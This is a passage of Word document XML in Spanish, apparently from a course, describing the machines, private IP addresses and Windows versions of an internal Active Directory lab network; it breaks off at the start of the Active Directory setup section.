    <w:p w14:paraId="3087F5EC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6AF22AA2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="675A8920" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="174B8FA2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D1E8C2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37DB2914" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DC3AC7E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BD61E0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A608AD8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54BB4A59" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302015EB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59F5AD30" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4101FBF4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="042BA09A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18BCE912" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22462910" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78A21643" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3D052B" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FC3424" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E6903BF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="159"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DC198D8"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85</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17116406" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId169"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="520" w:right="0" w:bottom="0" w:left="0" w:header="0" w:footer="0" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1136ED95"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800320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DF44A13" wp14:editId="7FCAB242">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="1325880"/>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25880"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="1325880"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="355" name="Graphic 355"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="l" t="t" r="r" b="b"/>
                            <a:pathLst>
                              <a:path w="12192000" h="1325880">
                                <a:moveTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="0" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="1325879"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12192000" y="0"/>
                                </a:lnTo>
                                <a:close/>
                              </a:path>
                            </a:pathLst>
                          </a:custGeom>
                          <a:solidFill>
                            <a:srgbClr val="B34512"/>
                          </a:solidFill>
                        </wps:spPr>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:prstTxWarp prst="textNoShape">
                            <a:avLst/>
                          </a:prstTxWarp>
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="356" name="Textbox 356"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="12192000" cy="1325880"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="6166A45C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                              <w:pPr>
                                <w:spacing w:before="422"/>
                                <w:ind w:left="3654"/>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>2.4.1 Descripci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n general de la configuraci</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>ó</w:t>
                              </w:r>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Calibri Light"/>
                                  <w:color w:val="FFFFFF"/>
                                  <w:sz w:val="88"/>
                                </w:rPr>
                                <w:t>n interna del laboratorio</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="5DF44A13" id="Group 354" o:spid="_x0000_s1175" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:104.4pt;z-index:15800320;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121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">
                <v:shape id="Graphic 355" o:spid="_x0000_s1176" style="position:absolute;width:121920;height:13258;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1219200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" path="m12192000,l,,,1325879r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Textbox 356" o:spid="_x0000_s1177" type="#_x0000_t202" style="position:absolute;width:121920;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6166A45C" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                        <w:pPr>
                          <w:spacing w:before="422"/>
                          <w:ind w:left="3654"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>2.4.1 Descripci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n general de la configuraci</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>ó</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Calibri Light"/>
                            <w:color w:val="FFFFFF"/>
                            <w:sz w:val="88"/>
                          </w:rPr>
                          <w:t>n interna del laboratorio</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="034537D6" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="117BC3E5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5416CFAE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A2A2C7E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="483"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EF98EEE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1069"/>
        </w:tabs>
        <w:ind w:left="1069" w:hanging="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Instalaremos 2 máquinas con roles asignados en la red interna:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ECF9EF" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1790"/>
        </w:tabs>
        <w:spacing w:before="568" w:line="484" w:lineRule="exact"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId170">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Controlador de dominio</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="76"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[10.10.10.2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3D0584" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1790"/>
        </w:tabs>
        <w:spacing w:line="480" w:lineRule="exact"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId171">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Empleado-Máquina</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="76"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[10.10.10.4]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C095B90" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1790"/>
        </w:tabs>
        <w:spacing w:line="484" w:lineRule="exact"/>
        <w:ind w:hanging="451"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId172">
        <w:r w:rsidRPr="007A7B84">
          <w:rPr>
            <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
            <w:color w:val="0462C1"/>
            <w:sz w:val="40"/>
            <w:szCs w:val="40"/>
            <w:u w:val="single" w:color="0462C1"/>
          </w:rPr>
          <w:t>Servidor de aplicaciones</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="0462C1"/>
          <w:spacing w:val="-3"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:u w:val="single" w:color="0462C1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>[10.10.10.3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E0A8F82" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36305328" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="463"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76F2F2B4" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1068"/>
          <w:tab w:val="left" w:pos="1070"/>
        </w:tabs>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:ind w:right="953"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Usaremos </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server 2016 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">para la configuración del controlador de dominio, </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows 10 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">como nuestra máquina de empleado y </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Server 2012 </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>como servidor de aplicaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6155E70A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:spacing w:line="235" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId173"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:pgNumType w:start="86"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378D4A04" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.4.2 Configuración del laboratorio de Active Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425D5E0F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12EE40CA" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="318"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="593848F8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1699"/>
        </w:tabs>
